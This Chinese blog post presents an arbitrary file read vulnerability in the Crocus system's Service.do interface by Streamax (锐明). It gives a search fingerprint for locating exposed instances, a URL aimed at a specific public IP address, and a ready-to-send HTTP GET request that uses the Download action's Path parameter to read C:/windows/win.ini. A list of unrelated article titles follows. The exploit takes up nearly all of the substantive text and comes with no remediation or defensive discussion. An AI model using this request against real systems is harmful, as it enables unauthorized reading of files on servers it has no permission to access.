漏洞挖掘---锐明Crocus系统Service.do接口任意文件读取

body="inp_verification"

#URL
http://110.52.91.154:8000/Service.do?Action=Download&Path=C:/windows/win.ini

#构造
GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host: ******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

相关文章：

《数字图像处理》第三章 3.8 基于模糊技术的图像强度变换与空间滤波学习笔记

微积分小白入门：第二章 数列与极限——从困惑到顿悟的奇妙之旅

Vue 3中的Provide与Inject

stm32f103c8t6使用pwm(DMA)驱动24个ws2812b灯驱动

【探寻C++之旅】第十章：map和set（STL续）

看 MySQL InnoDB 和 BoltDB 的事务实现

3.Excel：快速分析

深入理解现代C++在IT行业中的核心地位与应用实践

在 Windows 上安装 PowerShell 的多种方法与完整指南

【设计模式】策略模式（Strategy Pattern）详解

群体智能优化算法-沙丁鱼群优化算法（Salp Swarm Algorithm (SSA，含Matlab源代码）

C# Modbus TCP/IP学习记录

【Unity网络编程知识】使用Socket实现简单UDP通讯

算法 之 矩阵的对角线问题

Spring AI Alibaba 工具(Function Calling)使用

2025.3.25总结

Java动态代理的使用和安全问题

WPS二次开发系列：以自动播放模式打开PPT文档

【第五章】作业

MYSQL运维常用SQL

中医五行学说的系统性扩展讲解

计算机控制系统的最小拍控制器设计及仿真分析

【区块链安全 | 第二篇】区块链概念详解

鸿蒙开发：openCustomDialog关闭指定Dialog

Axure RP9.0 教程：左侧菜单列表导航 ( 点击父级菜单，子菜单自动收缩或展开)【响应式的菜单导航】

Qt在模块依靠情况下资源文件名称和资源名称的使用限制

微服务架构-Feign声明式调用

BoomCut AI 技术创建本地化的营销视频

three入门，创建一个长方体、认识场景、模型、光源、相机？渲染器

【蓝桥杯】真题 路径（数论+dp）